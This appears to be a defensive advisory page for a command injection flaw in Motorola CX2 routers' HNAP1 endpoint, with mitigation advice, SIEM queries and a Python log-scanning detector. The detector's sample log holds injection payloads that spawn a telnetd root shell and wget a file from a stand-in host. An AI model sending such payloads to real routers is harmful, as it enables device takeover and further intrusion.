CVE-2020-21935

9.8 CRITICAL

📋 TL;DR

This CVE describes an OS command injection vulnerability in the HNAP1 GetNetworkTomographySettings action of Motorola CX2 routers. An attacker who can reach the router's HTTP management service can run arbitrary shell commands on the device; on embedded Linux routers the HNAP service normally runs as root, so this amounts to full device compromise. Users running the affected Motorola CX2 firmware build are at risk.

💻 Affected Systems

Products:
  • Motorola CX2 router
Versions: CX 1.0.2 Build 20190508 Rel.97360n
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Affects the HNAP1 implementation, specifically the GetNetworkTomographySettings action. HNAP actions are sent as HTTP POST requests to /HNAP1/ with the action named in the SOAPAction header and in the SOAP body, so the vulnerable code is reached through the same HTTP listener as the web management interface.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the router allowing attackers to intercept traffic, modify configurations, install persistent backdoors, and pivot to internal networks.

🟠

Likely Case

Router takeover leading to DNS hijacking, credential theft from connected devices, and network disruption.

🟢

If Mitigated

Limited impact if the router's HTTP service (and therefore the HNAP1 endpoint) is unreachable from the WAN and from untrusted LAN or Wi-Fi clients. Because the injection is reachable without authentication, stronger administrator credentials do not reduce exposure on their own.

🌐 Internet-Facing: HIGH - Routers sit at the network edge, and the HNAP1 endpoint is reachable from the WAN whenever remote management is enabled or the HTTP service is bound to all interfaces.
🏢 Internal Only: MEDIUM - Any LAN or Wi-Fi client, including a compromised IoT device or guest, can reach the HNAP1 endpoint, so internal exploitation needs only network access, not credentials; external exploitation remains the more likely path.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Public exploit code is available in GitHub repositories; exploitation needs only the ability to send an HTTP POST to the router's /HNAP1/ endpoint, which makes it straightforward for anyone with network access to the device.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: No official vendor advisory found

Restart Required: No

Instructions:

No official patch available. Consider upgrading to newer router models or implementing workarounds.

🔧 Temporary Workarounds

Disable HNAP1 protocol

all

Disable HNAP1 if the firmware exposes a toggle for it. If it does not, block TCP/80 and TCP/443 to the router from untrusted segments, since HNAP shares the web management listener and cannot be filtered separately.

Network segmentation

all

Put the router's management interface on a dedicated management VLAN, disable remote (WAN) administration, and allow only trusted administrator hosts to reach the router's HTTP/HTTPS ports.

🧯 If You Can't Patch

  • Replace the affected router with a newer model that does not ship this firmware
  • Restrict network access to the router's management interface (HTTP/HTTPS) to trusted hosts only, from both the WAN and the LAN side

🔍 How to Verify

Check if Vulnerable:

Check the firmware version on the router's web interface (status or administration page). If it reports CX 1.0.2 Build 20190508 Rel.97360n, the device is vulnerable. Other builds have not been confirmed either way, so treat them as suspect until tested.

Check Version:

Open http://[router-ip]/ and read the firmware version from the status page. SSH is not typically available on consumer router firmware, so the web interface is usually the only option.

Verify Fix Applied:

Confirm the firmware reports a build newer than 20190508. Because no vendor fix is known, a newer build alone does not prove the injection is closed; re-test the GetNetworkTomographySettings action in a controlled environment before considering the device fixed.

📡 Detection & Monitoring

Log Indicators:

  • Unusual HNAP1 requests (POST /HNAP1/ from unexpected source addresses or outside normal administration windows)
  • Consumer router firmware rarely logs command execution; if the device offers a system log, look for unexpected service starts or reboots
  • Unexpected configuration changes (DNS servers, port forwards, administrator password)

Network Indicators:

  • Unusual traffic to the router's management ports (typically 80/443), especially from the WAN side
  • HTTP POST requests to /HNAP1/ whose SOAPAction header or body names GetNetworkTomographySettings and whose parameter values contain shell metacharacters (; | & ` $( or newlines)
  • Outbound connections from the router itself (download of a second-stage payload, reverse shell, or a new listener such as telnetd on a non-standard port)

SIEM Query:

source="router" AND (http_uri="*HNAP1*" OR http_uri="*GetNetworkTomographySettings*") AND http_method="POST"

Note that HNAP sends every action to the same URI (/HNAP1/) and names the action only in the SOAPAction header and SOAP body, so the http_uri match on GetNetworkTomographySettings will miss most requests. A query that matches the action name against the header or body fields your HTTP sensor exports is more reliable (field names vary by sensor):

http_method="POST" AND http_uri="*HNAP1*" AND (soapaction="*GetNetworkTomographySettings*" OR http_body="*GetNetworkTomographySettings*")

The router itself will not produce these fields; they have to come from a proxy, IDS, or passive HTTP sensor placed in front of the device.
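The detection logic described above, run over constructed HTTP sensor records, as an added example that is not part of the original page or of any vendor or exploit code. It assumes a JSON-lines export from an HTTP sensor placed in front of the router with request bodies captured; the field names (src, method, uri, soapaction, body) and the Address/Number/Size elements in the sample bodies are assumptions for this example. It classifies any POST to /HNAP1/ as HNAP traffic, raises a medium finding when the action is GetNetworkTomographySettings, and raises a high finding when any parameter value carries shell metacharacters, falling back to a raw-body scan when the SOAP body is not well-formed XML (a raw && in a value breaks XML parsing, so that case must not be silently dropped).

```python
import json
import re
import xml.etree.ElementTree as ET

# Constructed sample: one JSON object per line, in the shape an HTTP sensor
# (Zeek/Suricata-style) in front of the router might export. Field names and
# the Address/Number/Size elements are assumptions for this example.
SAMPLE_LOG = r'''
{"src": "203.0.113.7", "method": "POST", "uri": "/HNAP1/", "soapaction": "\"http://purenetworks.com/HNAP1/GetNetworkTomographySettings\"", "body": "<?xml version=\"1.0\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><GetNetworkTomographySettings xmlns=\"http://purenetworks.com/HNAP1/\"><Address>192.0.2.1; telnetd -p 9999 -l /bin/sh</Address><Number>1</Number><Size>64</Size></GetNetworkTomographySettings></soap:Body></soap:Envelope>"}
{"src": "192.168.1.20", "method": "POST", "uri": "/HNAP1/", "soapaction": "\"http://purenetworks.com/HNAP1/GetNetworkTomographySettings\"", "body": "<?xml version=\"1.0\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><GetNetworkTomographySettings xmlns=\"http://purenetworks.com/HNAP1/\"><Address>192.0.2.1</Address><Number>4</Number><Size>64</Size></GetNetworkTomographySettings></soap:Body></soap:Envelope>"}
{"src": "192.168.1.20", "method": "POST", "uri": "/HNAP1/", "soapaction": "\"http://purenetworks.com/HNAP1/GetDeviceSettings\"", "body": "<?xml version=\"1.0\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><GetDeviceSettings xmlns=\"http://purenetworks.com/HNAP1/\"/></soap:Body></soap:Envelope>"}
{"src": "203.0.113.9", "method": "POST", "uri": "/hnap1", "soapaction": "", "body": "<GetNetworkTomographySettings><Address>1.1.1.1 && wget http://203.0.113.9/x -O /tmp/x</Address>"}
{"src": "192.168.1.21", "method": "GET", "uri": "/", "soapaction": "", "body": ""}
'''

# Every HNAP action goes to this URI; the action itself is in SOAPAction/body.
HNAP_URI = re.compile(r"^/hnap1/?$", re.IGNORECASE)
TARGET_ACTION = "GetNetworkTomographySettings"
# Characters that let a value escape a shell command line.
SHELL_META = re.compile(r"[;|&`\n]|\$\(")


def text_values(body: str):
    """Yield the text of every element in a SOAP body.

    If the body is not well-formed XML (e.g. an unescaped && in a value),
    yield the raw body so the metacharacter check still runs over it.
    """
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        yield body
        return
    for el in root.iter():
        if el.text and el.text.strip():
            yield el.text.strip()


def classify(rec: dict):
    """Return a finding dict for an HNAP request, or None for unrelated traffic."""
    if (rec.get("method") or "").upper() != "POST" or not HNAP_URI.match(rec.get("uri") or ""):
        return None
    body = rec.get("body") or ""
    soapaction = rec.get("soapaction") or ""
    finding = {"src": rec.get("src", "?"), "action": soapaction}
    # Any HNAP POST is worth a baseline record, even if it is not the target action.
    if TARGET_ACTION.lower() not in (soapaction + body).lower():
        return {**finding, "severity": "info", "label": "hnap_request"}
    evidence = [v for v in text_values(body) if SHELL_META.search(v)]
    if evidence:
        return {**finding, "severity": "high",
                "label": "tomography_command_injection", "evidence": evidence}
    # Legitimate use of the tomography (ping test) feature from the router UI.
    return {**finding, "severity": "medium", "label": "tomography_request"}


def scan(log_text: str):
    """Run classify() over JSON-lines sensor output and collect the findings."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        finding = classify(json.loads(line))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"].upper(), f["src"], f["label"], f.get("evidence", ""))
```

The metacharacter set is deliberately narrow so that ordinary IPv4/IPv6 addresses and hostnames never trigger the high-severity rule; widen it only if the sensor shows the router accepting other delimiters. The raw-body fallback is what catches the fourth sample record, whose unescaped && would otherwise make the XML parser discard the request.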

🔗 References
